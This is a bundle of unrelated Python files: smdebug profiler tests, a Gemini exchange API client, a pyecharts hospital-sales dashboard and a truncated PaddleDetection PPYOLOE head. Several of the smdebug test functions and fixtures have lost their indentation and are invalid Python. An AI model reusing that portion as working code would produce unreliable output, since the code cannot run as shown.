        return reverse('edit_print', args=[self.pk])
|
# First Party
# Third Party
import pytest
from smdebug.profiler.analysis.utils.pandas_data_analysis import (
PandasFrameAnalysis,
Resource,
StatsBy,
)
from smdebug.profiler.analysis.utils.profiler_data_to_pandas import PandasFrame
@pytest.mark.parametrize("framework", ["tf2", "pt"])
def test_pandas_frames(framework):
bucket_name = (
"s3://smdebug-testing/resources/" + framework + "_detailed_profile/profiler-output"
)
pf = PandasFrame(bucket_name, scan_interval=50000000000)
system_metrics_df = pf.get_all_system_metrics()
print(f"Number of rows in system metrics dataframe = {system_metrics_df.shape[0]}")
if framework == "tf2":
assert system_metrics_df.shape[0] == 39392
if framework == "pt":
assert system_metrics_df.shape[0] == 84768
print(f"Number of columns in system metrics dataframe = {system_metrics_df.shape[1]}")
if framework == "tf2":
assert system_metrics_df.shape[1] == 7
if framework == "pt":
assert system_metrics_df.shape[1] == 7
pf = PandasFrame(bucket_name, scan_interval=50000000000)
framework_metrics_df = pf.get_all_framework_metrics()
print(f"Number of rows in framework metrics dataframe = {framework_metrics_df.shape[0]}")
if framework == "tf2":
assert framework_metrics_df.shape[0] == 73984
if framework == "pt":
assert framework_metrics_df.shape[0] == 154192
print(f"Number of columns in framework metrics dataframe = {framework_metrics_df.shape[1]}")
if framework == "tf2":
assert framework_metrics_df.shape[1] == 11
if framework == "pt":
assert framework_metrics_df.shape[1] == 11
@pytest.mark.parametrize("framework", ["tf2", "pt"])
def test_get_data_by_time(framework):
bucket_name = (
"s3://smdebug-testing/resources/" + framework + "_detailed_profile/profiler-output"
)
pf = PandasFrame(bucket_name, scan_interval=50000000000)
if framework == "tf2":
system_metrics_df, framework_metrics_df = pf.get_profiler_data_by_time(
1596668220000000, 1596678220000000
)
assert system_metrics_df.shape[0] == 39392
if framework == "pt":
system_metrics_df, framework_metrics_df = pf.get_profiler_data_by_time(
1596493560000000, 1596499560000000
)
assert system_metrics_df.shape[0] == 84768
print(f"Number of rows in system metrics dataframe = {system_metrics_df.shape[0]}")
print(f"Number of columns in system metrics dataframe = {system_metrics_df.shape[1]}")
assert system_metrics_df.shape[1] == 7
print(f"Number of rows in framework metrics dataframe = {framework_metrics_df.shape[0]}")
if framework == "tf2":
assert framework_metrics_df.shape[0] == 73984
if framework == "pt":
assert framework_metrics_df.shape[0] == 154192
print(f"Number of columns in framework metrics dataframe = {framework_metrics_df.shape[1]}")
assert framework_metrics_df.shape[1] == 11
@pytest.mark.parametrize("framework", ["tf2", "pt"])
def test_get_data_by_step(framework):
bucket_name = (
"s3://smdebug-testing/resources/" + framework + "_detailed_profile/profiler-output"
)
pf = PandasFrame(bucket_name)
_, framework_metrics_df = pf.get_profiler_data_by_step(2, 3)
assert not framework_metrics_df.empty
assert framework_metrics_df.groupby("step").ngroups == 2
print(f"Number of rows in framework metrics dataframe = {framework_metrics_df.shape[0]}")
if framework == "tf2":
assert framework_metrics_df.shape[0] == 5
if framework == "pt":
assert framework_metrics_df.shape[0] == 738
print(f"Number of columns in framework metrics dataframe = {framework_metrics_df.shape[1]}")
assert framework_metrics_df.shape[1] == 11
def get_metrics(framework):
    """Load both metric frames for a framework, using the in-memory cache."""
    bucket_name = (
        "s3://smdebug-testing/resources/" + framework + "_detailed_profile/profiler-output"
    )
    pf = PandasFrame(bucket_name, use_in_memory_cache=True)
    system_df = pf.get_all_system_metrics()
    framework_df = pf.get_all_framework_metrics()
    return system_df, framework_df
@pytest.fixture(scope="module", autouse=True)
def tf_pandas_frame_analysis():
return PandasFrameAnalysis(*get_metrics("tf2"))
@pytest.fixture(scope="module", autouse=True)
def pt_pandas_frame_analysis():
return PandasFrameAnalysis(*get_metrics("pt"))
@pytest.mark.slow
@pytest.mark.parametrize("framework", ["tf2", "pt"])
@pytest.mark.parametrize(
    "by", [StatsBy.TRAINING_PHASE, StatsBy.FRAMEWORK_METRICS, StatsBy.PROCESS, "step"]
)
def test_get_step_stats(framework, by, tf_pandas_frame_analysis, pt_pandas_frame_analysis):
    """Step statistics have the expected shape per grouping; a plain string
    is not a valid StatsBy value and yields None."""
    pf_analysis = tf_pandas_frame_analysis if framework == "tf2" else pt_pandas_frame_analysis
    step_stats = pf_analysis.get_step_statistics(by=by)
    if by == "step":
        assert step_stats is None
        return
    assert not step_stats.empty
    assert step_stats.shape[1] == 7
    # Row counts depend on the grouping and the framework's profile contents.
    if by == "training_phase":
        assert step_stats.shape[0] == (2 if framework == "tf2" else 1)
    elif by == "framework_metric":
        assert step_stats.shape[0] == (111 if framework == "tf2" else 207)
    elif by == "process":
        assert step_stats.shape[0] == (6 if framework == "tf2" else 7)
@pytest.mark.slow
@pytest.mark.parametrize("framework", ["tf2", "pt"])
@pytest.mark.parametrize("phase", [["Step:ModeKeys.TRAIN"], None])
def test_get_util_stats_by_training_phase(
    framework, phase, tf_pandas_frame_analysis, pt_pandas_frame_analysis
):
    """Utilization stats grouped by training phase, optionally filtered to one phase."""
    if framework == "tf2":
        pf_analysis = tf_pandas_frame_analysis
    else:
        # PyTorch runs label the training phase GLOBAL rather than TRAIN.
        if phase and phase[0] == "Step:ModeKeys.TRAIN":
            phase = ["Step:ModeKeys.GLOBAL"]
        pf_analysis = pt_pandas_frame_analysis
    util_stats = pf_analysis.get_utilization_stats(phase=phase, by=StatsBy.TRAINING_PHASE)
    assert not util_stats.empty
    # Same upper bound whether or not a phase filter was applied.
    assert util_stats.shape[0] <= 8
    assert util_stats.shape[1] == 9
    assert all(util_stats["Resource"].unique() == ["cpu", "gpu"])
@pytest.mark.slow
@pytest.mark.parametrize("framework", ["tf2", "pt"])
@pytest.mark.parametrize("resource", [None, Resource.CPU, [Resource.CPU, Resource.GPU], "cpu"])
@pytest.mark.parametrize("by", [None, "step"])
def test_get_util_stats(
    framework, resource, by, tf_pandas_frame_analysis, pt_pandas_frame_analysis
):
    """Utilization stats: invalid `by`/`resource` strings must yield None."""
    pf_analysis = tf_pandas_frame_analysis if framework == "tf2" else pt_pandas_frame_analysis
    util_stats = pf_analysis.get_utilization_stats(resource=resource, by=by)
    invalid_args = by == "step" or resource == "cpu"
    if invalid_args:
        assert util_stats is None
    else:
        assert not util_stats.empty
@pytest.mark.slow
@pytest.mark.parametrize("framework", ["tf2", "pt"])
@pytest.mark.parametrize("device", ["cpu", Resource.CPU, Resource.GPU])
@pytest.mark.parametrize(
    "ranges", [None, [(0, 10), (10, 20), (30, 80), (80, 100)], [(30,)], [], ((0, 10), (10, 90))]
)
def test_get_device_usage_stats(
    framework, device, ranges, tf_pandas_frame_analysis, pt_pandas_frame_analysis
):
    """Device usage stats: malformed ranges or a bare string device give an empty frame."""
    pf_analysis = tf_pandas_frame_analysis if framework == "tf2" else pt_pandas_frame_analysis
    usage_stats = pf_analysis.get_device_usage_stats(device=device, utilization_ranges=ranges)
    malformed = [[(30,)], [], ((0, 10), (10, 90))]
    if ranges in malformed or device == "cpu":
        assert usage_stats.empty
    else:
        assert not usage_stats.empty
        # 3 fixed columns plus one per utilization bucket (default is 3 buckets).
        bucket_count = 3 if ranges is None else len(ranges)
        assert usage_stats.shape[1] <= 3 + bucket_count
@pytest.mark.slow
@pytest.mark.parametrize("framework", ["tf2", "pt"])
@pytest.mark.parametrize(
    "phase",
    [
        ["Step:ModeKeys.TRAIN"],
        "Step:ModeKeys.TRAIN",
        ["Step:ModeKeys.GLOBAL"],
        ("Step:ModeKeys.GLOBAL"),  # NOTE: parens without a comma — this is a plain str
    ],
)
def test_get_training_phase_intervals(
    framework, phase, tf_pandas_frame_analysis, pt_pandas_frame_analysis
):
    """Phase intervals exist only for the framework's own phase label; other
    phases (and hence the cross-framework cases) must return None."""
    if framework == "tf2":
        valid_phase = ["Step:ModeKeys.TRAIN"]
        pf_analysis = tf_pandas_frame_analysis
    else:
        valid_phase = ["Step:ModeKeys.GLOBAL"]
        pf_analysis = pt_pandas_frame_analysis
    interval_stats = pf_analysis.get_training_phase_intervals(phase=phase)
    # Normalize: a single phase may be passed as a bare string.
    if isinstance(phase, str):
        phase = [phase]
    # After normalization `phase` is always a list, so the old
    # `not isinstance(phase, list)` guard (and its debug prints) was dead code.
    if phase != valid_phase:
        assert interval_stats is None
    else:
        assert not interval_stats.empty
        assert interval_stats.shape[1] == 3
        assert interval_stats.shape[0] == (11251 if framework == "tf2" else 785)
@pytest.mark.slow
@pytest.mark.parametrize("framework", ["tf2"])
def test_get_jobs_stats(framework, tf_pandas_frame_analysis, pt_pandas_frame_analysis):
    """Job-level statistics should be computable (currently exercised for TF2 only)."""
    pf_analysis = tf_pandas_frame_analysis if framework == "tf2" else pt_pandas_frame_analysis
    job_stats = pf_analysis.get_job_statistics()
    assert job_stats is not None
|
<reponame>hayden4r4/Gemini-API-Wrapper-Python
import requests
import json
import base64
import hmac
import hashlib
import datetime
import time
class gemini_kit:
    """Minimal client for Gemini's private (authenticated) REST API.

    Every private endpoint takes a JSON payload that is base64-encoded,
    HMAC-SHA384 signed with the API secret, and sent in request headers.
    Pass ``sandbox=True`` to target the sandbox environment and ``account``
    to act on a specific account of a master API key.
    """

    def __init__(self, gemini_api_key: str, gemini_api_secret: str, account: str = None, sandbox: bool = False):
        self.gemini_api_key = gemini_api_key
        # HMAC keys must be bytes, so encode the secret once up front.
        self.gemini_api_secret = gemini_api_secret.encode()
        self.account = account
        if sandbox:
            self.base_url = "https://api.sandbox.gemini.com"
        else:
            self.base_url = "https://api.gemini.com"

    def __create_nonce(self) -> str:
        """Return a fresh millisecond-scale nonce.

        Gemini requires nonces to be increasing per API key; this uses the
        current wall-clock second * 1000, matching the original behavior.
        """
        return str(int(time.mktime(datetime.datetime.now().timetuple()) * 1000))

    def place_order(self, symbol: str, amount: str, price: str, side: str, order_type: str = "exchange limit", options: list = None, stop_price: str = None) -> dict:
        """Place a new order.

        symbol: 'btcusd', 'ethusd', etc...
        side: "buy", "sell"
        order_type: "exchange limit", "exchange stop limit"
        options (optional) list: "maker-or-cancel", "immediate-or-cancel", "fill-or-kill", "auction-only", "indication-of-interest"
        stop_price (optional)
        """
        self.endpoint = "/v1/order/new"
        self.url = self.base_url + self.endpoint
        self.payload_nonce = self.__create_nonce()
        self.payload = {
            "request": self.endpoint,
            "nonce": self.payload_nonce,
            "symbol": symbol,
            "amount": amount,
            "price": price,
            "side": side,
            "type": order_type
        }
        # Optional fields are only sent when supplied.
        if options:
            self.payload["options"] = options
        if stop_price:
            self.payload["stop_price"] = stop_price
        if self.account:
            self.payload["account"] = self.account
        self.response = self.__send_payload()
        return self.response

    def cancel_order(self, order_id: str, all: "bool | str" = False) -> dict:
        """Cancel one or more orders.

        all (optional): True, False, 'session'
        Cancels orders, if all=True it will cancel all open orders,
        if all='session' it will cancel all orders from session
        """
        # NOTE: `all` shadows the builtin but is kept for backward compatibility.
        if all is True:
            self.endpoint = '/v1/order/cancel/all'
        elif isinstance(all, str):
            if all.lower() == 'session':
                self.endpoint = '/v1/order/cancel/session'
            else:
                raise ValueError(
                    f"Invalid argument {all} for all, must be: bool or 'session'")
        else:
            self.endpoint = "/v1/order/cancel"
        self.url = self.base_url + self.endpoint
        self.payload_nonce = self.__create_nonce()
        self.payload = {
            "nonce": self.payload_nonce,
            "order_id": order_id,
            "request": self.endpoint
        }
        if self.account:
            self.payload['account'] = self.account
        self.response = self.__send_payload()
        return self.response

    def order_status(self, order_id: str = None, include_trades: bool = True, client_order_id: str = None) -> dict:
        """Get the status of a single order.

        Raises ValueError when neither order_id nor client_order_id is given.
        NOTE(review): `include_trades` is accepted but never forwarded in the
        payload — confirm against the /v1/order/status parameters.
        """
        self.endpoint = "/v1/order/status"
        self.url = self.base_url + self.endpoint
        self.payload_nonce = self.__create_nonce()
        if order_id:
            self.order_id = order_id
        elif client_order_id:
            self.order_id = client_order_id
        else:
            raise ValueError('Must supply either order_id or client_order_id')
        self.payload = {
            "nonce": self.payload_nonce,
            "order_id": self.order_id,
            "request": self.endpoint
        }
        if self.account:
            self.payload['account'] = self.account
        self.response = self.__send_payload()
        return self.response

    def get_active_orders(self) -> list:
        """Get the status of all active orders."""
        self.endpoint = "/v1/orders"
        self.url = self.base_url + self.endpoint
        self.payload_nonce = self.__create_nonce()
        self.payload = {
            "nonce": self.payload_nonce,
            "request": self.endpoint
        }
        if self.account:
            self.payload['account'] = self.account
        self.response = self.__send_payload()
        return self.response

    def get_past_trades(self, symbol: str) -> list:
        """Get past trades for the given symbol ('btcusd', 'ethusd', etc...)."""
        self.endpoint = "/v1/mytrades"
        self.url = self.base_url + self.endpoint
        self.payload_nonce = self.__create_nonce()
        self.payload = {
            "nonce": self.payload_nonce,
            "request": self.endpoint,
            "symbol": symbol
        }
        if self.account:
            self.payload['account'] = self.account
        self.response = self.__send_payload()
        return self.response

    def get_balances(self) -> list:
        """Get current balances."""
        self.endpoint = "/v1/balances"
        self.url = self.base_url + self.endpoint
        self.payload_nonce = self.__create_nonce()
        self.payload = {
            "nonce": self.payload_nonce,
            "request": self.endpoint
        }
        if self.account:
            self.payload['account'] = self.account
        self.response = self.__send_payload()
        return self.response

    def get_notional_balances(self, currency: str = 'USD') -> list:
        """Get current balances expressed in the given notional currency."""
        self.currency = currency.lower()
        self.endpoint = f"/v1/notionalbalances/{self.currency}"
        self.url = self.base_url + self.endpoint
        self.payload_nonce = self.__create_nonce()
        self.payload = {
            "nonce": self.payload_nonce,
            "request": self.endpoint
        }
        if self.account:
            self.payload['account'] = self.account
        self.response = self.__send_payload()
        return self.response

    def get_accounts_in_master_group(self):
        """Get all accounts in the master group (master-key only endpoint,
        so no per-account override is attached)."""
        self.endpoint = "/v1/account/list"
        self.url = self.base_url + self.endpoint
        self.payload_nonce = self.__create_nonce()
        self.payload = {
            "nonce": self.payload_nonce,
            "request": self.endpoint
        }
        self.response = self.__send_payload()
        return self.response

    def __send_payload(self) -> dict:
        """Sign self.payload per Gemini's scheme (base64 JSON + HMAC-SHA384)
        and POST it, returning the decoded JSON response.

        Gemini private endpoints carry the request in headers, not the body,
        hence data=None and Content-Length "0".
        """
        self.encoded_payload = json.dumps(self.payload).encode()
        self.b64 = base64.b64encode(self.encoded_payload)
        self.signature = hmac.new(
            self.gemini_api_secret, self.b64, hashlib.sha384).hexdigest()
        self.request_headers = {'Content-Type': "text/plain",
                                'Content-Length': "0",
                                'X-GEMINI-APIKEY': self.gemini_api_key,
                                'X-GEMINI-PAYLOAD': self.b64,
                                'X-GEMINI-SIGNATURE': self.signature,
                                'Cache-Control': "no-cache"}
        self.response = requests.post(self.url,
                                      data=None,
                                      headers=self.request_headers)
        self.response = self.response.json()
        return self.response
|
import pandas as pd
import sqlite3
from pyecharts import options as opts
from pyecharts.charts import Timeline, Grid, Bar, Map, Pie, Line
from pyecharts.globals import WarningType
from pyecharts.globals import ThemeType
from pyecharts.commons.utils import JsCode
from typing import List
import math
import platform
import subprocess
import numpy as np
import os
class HospitalSalesCalculation:
    """Build interactive pyecharts dashboards (timeline maps and an
    all-in-one chart) from a business unit's hospital sales SQLite database."""

    # NOTE: the constructor mutates these via self.__class__, so every
    # instance shares one configuration (kept for backward compatibility).
    bu_name = ''
    database_path = '../data/_DB/'
    update_file_path = '../data/_Update/'
    sys_path = os.path.abspath('..')
    chart_path = sys_path + "/data/_Charter/"

    def __init__(self, bu_input):
        self.__class__.bu_name = bu_input

    @staticmethod
    def _open_chart_file(chart_full_name):
        """Open a rendered chart in the default viewer, portable across OSes."""
        system_name = platform.system()
        if system_name == "Linux":
            subprocess.call(["xdg-open", chart_full_name])
        elif system_name == "Darwin":
            # Fix: os.startfile exists only on Windows; macOS needs `open`.
            subprocess.call(["open", chart_full_name])
        else:
            os.startfile(chart_full_name)

    def read_china_sales_data(self):
        """Aggregate monthly sales by province (in MM RMB) and draw a China map."""
        database_full_name = self.__class__.database_path + self.__class__.bu_name + '_Hospital_Sales.db'
        # Table names cannot be parameterized; this one is built from the
        # internally configured BU code, not external input.
        data_file_name = self.__class__.bu_name + '_Hospital_Sales'
        conn = sqlite3.connect(database_full_name)
        # get month list
        sql_cmd = 'SELECT DISTINCT(Month) FROM ' + data_file_name
        month_list = [item[0] for item in pd.read_sql(con=conn, sql=sql_cmd).values.tolist()]
        # read province and monthly sales data from database
        sql_cmd = 'SELECT Month, Province, round(sum(Sales_Value)/1000000, 1) as Sales_Value FROM ' + data_file_name + \
                  ' GROUP BY Province, Month ORDER BY Month'
        df_sales = pd.read_sql(con=conn, sql=sql_cmd)
        max_sales = math.ceil(df_sales.loc[:, 'Sales_Value'].max())
        # collect per-month [province, value] pairs
        dict_sales = {}
        for month_item in month_list:
            df_monthly_sales = df_sales.loc[df_sales['Month'] == month_item, ['Province', 'Sales_Value']]
            dict_sales[month_item] = df_monthly_sales.values.tolist()
        # draw chart
        self.draw_map_chart(dict_sales, max_sales, 'china')

    def read_province_sales_data(self, province_selected):
        """Aggregate monthly sales by city for one province and draw its map."""
        database_full_name = self.__class__.database_path + self.__class__.bu_name + '_Hospital_Sales.db'
        data_file_name = self.__class__.bu_name + '_Hospital_Sales'
        conn = sqlite3.connect(database_full_name)
        # get month list
        sql_cmd = 'SELECT DISTINCT(Month) FROM ' + data_file_name
        month_list = [item[0] for item in pd.read_sql(con=conn, sql=sql_cmd).values.tolist()]
        # Fix: parameterize the province filter instead of concatenating it
        # into the SQL string (injection-safe and quote-safe).
        sql_cmd = 'SELECT Month, City, round(sum(Sales_Value)/1000000, 1) as Sales_Value FROM ' + data_file_name + \
                  ' WHERE Province = ? GROUP BY City, Month ORDER BY Month'
        df_sales = pd.read_sql(con=conn, sql=sql_cmd, params=(province_selected,))
        max_sales = math.ceil(df_sales.loc[:, 'Sales_Value'].max())
        # collect per-month [city, value] pairs
        dict_sales = {}
        for month_item in month_list:
            df_monthly_sales = df_sales.loc[df_sales['Month'] == month_item, ['City', 'Sales_Value']]
            dict_sales[month_item] = df_monthly_sales.values.tolist()
        # draw chart
        self.draw_map_chart(dict_sales, max_sales, province_selected)

    def draw_map_chart(self, data_input, data_max, region):
        """Render a month-by-month Timeline of Map charts and open the result.

        data_input: {month: [[area, value], ...]}; region is 'china' or a
        province name.
        """
        WarningType.ShowWarning = False
        month_list = list(data_input.keys())
        tl = Timeline(init_opts=opts.InitOpts(width="1200px", height="800px", theme=ThemeType.VINTAGE))
        for month_item in month_list:
            sales_data = data_input[month_item]
            if region != 'china':
                # pyecharts province maps key cities with a trailing '市'.
                sales_data = [[item[0] + '市', item[1]] for item in sales_data]
            map0 = (
                Map()
                .add(self.__class__.bu_name, sales_data, region)
                .set_global_opts(
                    title_opts=opts.TitleOpts(title="%s销售数据(MM RMB) - %s" % (region, month_item)),
                    visualmap_opts=opts.VisualMapOpts(max_=data_max,
                                                      is_calculable=True,
                                                      range_color=["lightskyblue", "yellow", "orangered"],),
                )
            )
            tl.add(map0, "{}".format(month_item))
        chart_full_name = self.__class__.chart_path + "timeline_map.html"
        tl.render(chart_full_name)
        self._open_chart_file(chart_full_name)

    def generate_province_list(self):
        """Return the distinct provinces present in the BU's sales table."""
        database_full_name = self.__class__.database_path + self.__class__.bu_name + '_Hospital_Sales.db'
        data_file_name = self.__class__.bu_name + '_Hospital_Sales'
        conn = sqlite3.connect(database_full_name)
        sql_cmd = 'SELECT DISTINCT(Province) FROM ' + data_file_name
        df = pd.read_sql(con=conn, sql=sql_cmd)
        return [item[0] for item in df.values.tolist()]

    # get data list for AIO chart
    def get_data_for_AIO_chart(self):
        """Collect everything the all-in-one chart needs.

        Returns [month_list, list_final_data, list_monthly_ttl, minNum, maxNum]
        where list_final_data holds, per month, {'name': province,
        'value': [sales, ratio%, province]} records, and list_monthly_ttl is
        the monthly total in MM RMB.
        """
        database_full_name = self.__class__.database_path + self.__class__.bu_name + '_Hospital_Sales.db'
        data_file_name = self.__class__.bu_name + '_Hospital_Sales'
        conn = sqlite3.connect(database_full_name)
        sql_cmd = 'SELECT Month, Province, round(sum(Sales_Value),0) as Sales_Value FROM ' + data_file_name + \
                  ' GROUP BY Month, Province Order by Month, Sales_Value DESC'
        df_sales_result = pd.read_sql(con=conn, sql=sql_cmd)
        # get month_list
        month_list = df_sales_result['Month'].unique().tolist()
        list_final_data = []
        for month_item in month_list:
            df_monthly_sales = df_sales_result.loc[df_sales_result['Month'] == month_item, ['Province', 'Sales_Value']]
            df_monthly_sales['Ratio'] = df_monthly_sales['Sales_Value'] / df_monthly_sales['Sales_Value'].sum() * 100
            list_monthly_sales = df_monthly_sales.values.tolist()
            # generate dict for final data
            list_value = []
            for item_monthly_sales in list_monthly_sales:
                [item_province, item_sales_value, item_ratio] = item_monthly_sales
                list_value.append({"name": item_province, "value": [item_sales_value, item_ratio, item_province]})
            list_final_data.append({'time': month_item, 'data': list_value})
        # get monthly ttl IMS (in MM RMB)
        df_monthly_ttl = df_sales_result.pivot_table(index='Month', values='Sales_Value', aggfunc=np.sum)
        list_monthly_ttl = [round(item[0] / 1000000, 2) for item in df_monthly_ttl.values.tolist()]
        # get min and max
        minNum, maxNum = df_sales_result['Sales_Value'].min(), df_sales_result['Sales_Value'].max()
        return [month_list, list_final_data, list_monthly_ttl, minNum, maxNum]

    # generate AIO chart
    def generate_AIO_chart(self, year, data, time_list, total_num, maxNum, minNum):
        """Compose one timeline frame: map + trend line + ranked bar + pie
        for the given time point (`year` is one entry of `time_list`)."""
        map_data = [
            [[x["name"], x["value"]] for x in d["data"]] for d in data if d["time"] == year
        ][0]
        min_data, max_data = (minNum, maxNum)
        # Mark only the current time point on the trend line.
        data_mark: List = []
        for idx, x in enumerate(time_list):
            data_mark.append(total_num[idx] if x == year else "")
        map_chart = (
            Map()
            .add(
                series_name="",
                data_pair=map_data,
                zoom=1,
                center=[119.5, 34.5],
                is_map_symbol_show=False,
                itemstyle_opts={
                    "normal": {"areaColor": "#323c48", "borderColor": "#404a59"},
                    # Fix: the original passed the Timeline class object here;
                    # "show" expects a boolean.
                    "emphasis": {
                        "label": {"show": True},
                        "areaColor": "rgba(255,255,255, 0.5)",
                    },
                },
            )
            .set_global_opts(
                title_opts=opts.TitleOpts(
                    title="All-in-One Chart of IMS Distribution - " + str(year),
                    subtitle="",
                    pos_left="center",
                    pos_top="top",
                    title_textstyle_opts=opts.TextStyleOpts(
                        font_size=25, color="rgba(255,255,255, 0.9)"
                    ),
                ),
                tooltip_opts=opts.TooltipOpts(
                    is_show=True,
                    formatter=JsCode(
                        """function(params) {
                        if ('value' in params.data) {
                            return params.data.value[2] + ': ' + params.data.value[0];
                        }
                    }"""
                    ),
                ),
                visualmap_opts=opts.VisualMapOpts(
                    is_calculable=True,
                    dimension=0,
                    pos_left="30",
                    pos_top="center",
                    range_text=["High", "Low"],
                    range_color=["lightskyblue", "yellow", "orangered"],
                    textstyle_opts=opts.TextStyleOpts(color="#ddd"),
                    min_=min_data,
                    max_=max_data,
                ),
            )
        )
        line_chart = (
            Line()
            .add_xaxis(time_list)
            .add_yaxis("", total_num)
            .add_yaxis(
                "",
                data_mark,
                markpoint_opts=opts.MarkPointOpts(data=[opts.MarkPointItem(type_="max")]),
            )
            .set_series_opts(label_opts=opts.LabelOpts(is_show=False))
            .set_global_opts(
                title_opts=opts.TitleOpts(
                    title="Monthly IMS Total Value (MM RMB)", pos_left="72%", pos_top="5%"
                )
            )
        )
        bar_x_data = [x[0] for x in map_data]
        bar_y_data = [{"name": x[0], "value": x[1][0]} for x in map_data]
        bar = (
            Bar()
            .add_xaxis(xaxis_data=bar_x_data)
            .add_yaxis(
                series_name="",
                y_axis=bar_y_data,
                label_opts=opts.LabelOpts(
                    is_show=True, position="right", formatter="{b} : {c}"
                ),
            )
            .reversal_axis()
            .set_global_opts(
                xaxis_opts=opts.AxisOpts(
                    max_=maxNum, axislabel_opts=opts.LabelOpts(is_show=False)
                ),
                yaxis_opts=opts.AxisOpts(axislabel_opts=opts.LabelOpts(is_show=False)),
                tooltip_opts=opts.TooltipOpts(is_show=False),
                visualmap_opts=opts.VisualMapOpts(
                    is_calculable=True,
                    dimension=0,
                    pos_left="10",
                    pos_top="top",
                    range_text=["High", "Low"],
                    range_color=["lightskyblue", "yellow", "orangered"],
                    textstyle_opts=opts.TextStyleOpts(color="#ddd"),
                    min_=min_data,
                    max_=max_data,
                ),
            )
        )
        pie_data = [[x[0], x[1][0]] for x in map_data]
        pie = (
            Pie()
            .add(
                series_name="",
                data_pair=pie_data,
                radius=["15%", "35%"],
                center=["80%", "82%"],
                itemstyle_opts=opts.ItemStyleOpts(
                    border_width=1, border_color="rgba(0,0,0,0.3)"
                ),
            )
            .set_global_opts(
                tooltip_opts=opts.TooltipOpts(is_show=True, formatter="{b} {d}%"),
                legend_opts=opts.LegendOpts(is_show=False),
            )
        )
        grid_chart = (
            Grid()
            .add(
                bar,
                grid_opts=opts.GridOpts(
                    pos_left="10", pos_right="45%", pos_top="50%", pos_bottom="5"
                ),
            )
            .add(
                line_chart,
                grid_opts=opts.GridOpts(
                    pos_left="65%", pos_right="80", pos_top="10%", pos_bottom="50%"
                ),
            )
            .add(pie, grid_opts=opts.GridOpts(pos_left="45%", pos_top="60%"))
            .add(map_chart, grid_opts=opts.GridOpts())
        )
        return grid_chart

    def start_generate_AIO_chart(self):
        """Build the full AIO timeline (one frame per month) and open it."""
        WarningType.ShowWarning = False
        [time_list, data, total_num, minNum, maxNum] = self.get_data_for_AIO_chart()
        timeline = Timeline(
            init_opts=opts.InitOpts(width="1600px", height="900px", theme=ThemeType.PURPLE_PASSION)
        )
        for y in time_list:
            g = self.generate_AIO_chart(y, data, time_list, total_num, maxNum, minNum)
            timeline.add(g, time_point=str(y))
        timeline.add_schema(
            orient="vertical",
            is_auto_play=True,
            is_inverse=True,
            play_interval=5000,
            pos_left="null",
            pos_right="5",
            pos_top="20",
            pos_bottom="20",
            width="60",
            label_opts=opts.LabelOpts(is_show=True, color="#fff"),
        )
        chart_full_name = self.__class__.chart_path + "AIO.html"
        timeline.render(chart_full_name)
        self._open_chart_file(chart_full_name)
if __name__ == '__main__':
    # Smoke-run: build the all-in-one sales chart for the 'TU' business unit.
    test = HospitalSalesCalculation('TU')
    test.start_generate_AIO_chart()
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from ppdet.core.workspace import register
from ..bbox_utils import batch_distance2bbox
from ..losses import GIoULoss
from ..initializer import bias_init_with_prob, constant_, normal_
from ..assigners.utils import generate_anchors_for_grid_cell
from ppdet.modeling.backbones.cspresnet import ConvBNLayer
from ppdet.modeling.ops import get_static_shape, paddle_distributed_is_initialized, get_act_fn
__all__ = ['PPYOLOEHead']
class ESEAttn(nn.Layer):
    """Channel-attention stem: gates `feat` with a sigmoid of a 1x1 conv over
    the pooled features, then refines the result with a 1x1 ConvBNLayer.

    Attribute names (`fc`, `conv`) are kept as-is — they are state_dict keys.
    """

    def __init__(self, feat_channels, act='swish'):
        super(ESEAttn, self).__init__()
        self.fc = nn.Conv2D(feat_channels, feat_channels, 1)
        self.conv = ConvBNLayer(feat_channels, feat_channels, 1, act=act)
        self._init_weights()

    def _init_weights(self):
        # Small-std random init for the gating conv's weights.
        normal_(self.fc.weight, std=0.001)

    def forward(self, feat, avg_feat):
        gate = F.sigmoid(self.fc(avg_feat))
        attended = feat * gate
        return self.conv(attended)
@register
class PPYOLOEHead(nn.Layer):
    """PP-YOLOE anchor-free detection head.

    Per FPN level: an ESE-attention stem feeds a classification conv
    (num_classes channels) and a regression conv that predicts a discrete
    distribution of (reg_max + 1) bins for each of the 4 box sides (DFL-style).
    Training uses ATSS assignment for the first `static_assigner_epoch`
    epochs, then task-aligned assignment; the loss combines VFL/focal
    classification, GIoU + L1 box terms and a distribution-focal term.
    """
    __shared__ = ['num_classes', 'trt', 'exclude_nms']
    __inject__ = ['static_assigner', 'assigner', 'nms']

    def __init__(self,
                 in_channels=[1024, 512, 256],
                 num_classes=80,
                 act='swish',
                 fpn_strides=(32, 16, 8),
                 grid_cell_scale=5.0,
                 grid_cell_offset=0.5,
                 reg_max=16,
                 static_assigner_epoch=4,
                 use_varifocal_loss=True,
                 static_assigner='ATSSAssigner',
                 assigner='TaskAlignedAssigner',
                 nms='MultiClassNMS',
                 eval_input_size=[],
                 loss_weight={
                     'class': 1.0,
                     'iou': 2.5,
                     'dfl': 0.5,
                 },
                 trt=False,
                 exclude_nms=False):
        """Build stems, prediction convs and the fixed DFL projection conv.

        eval_input_size: optional [height, width]; when set, eval-time anchors
        are precomputed once in _init_weights instead of per forward pass.
        """
        super(PPYOLOEHead, self).__init__()
        assert len(in_channels) > 0, "len(in_channels) should > 0"
        self.in_channels = in_channels
        self.num_classes = num_classes
        self.fpn_strides = fpn_strides
        self.grid_cell_scale = grid_cell_scale
        self.grid_cell_offset = grid_cell_offset
        self.reg_max = reg_max
        self.iou_loss = GIoULoss()
        self.loss_weight = loss_weight
        self.use_varifocal_loss = use_varifocal_loss
        self.eval_input_size = eval_input_size
        self.static_assigner_epoch = static_assigner_epoch
        self.static_assigner = static_assigner
        self.assigner = assigner
        self.nms = nms
        self.exclude_nms = exclude_nms
        # stem
        self.stem_cls = nn.LayerList()
        self.stem_reg = nn.LayerList()
        # Resolve string/dict activation specs into callables (TRT-aware).
        act = get_act_fn(
            act, trt=trt) if act is None or isinstance(act,
                                                       (str, dict)) else act
        for in_c in self.in_channels:
            self.stem_cls.append(ESEAttn(in_c, act=act))
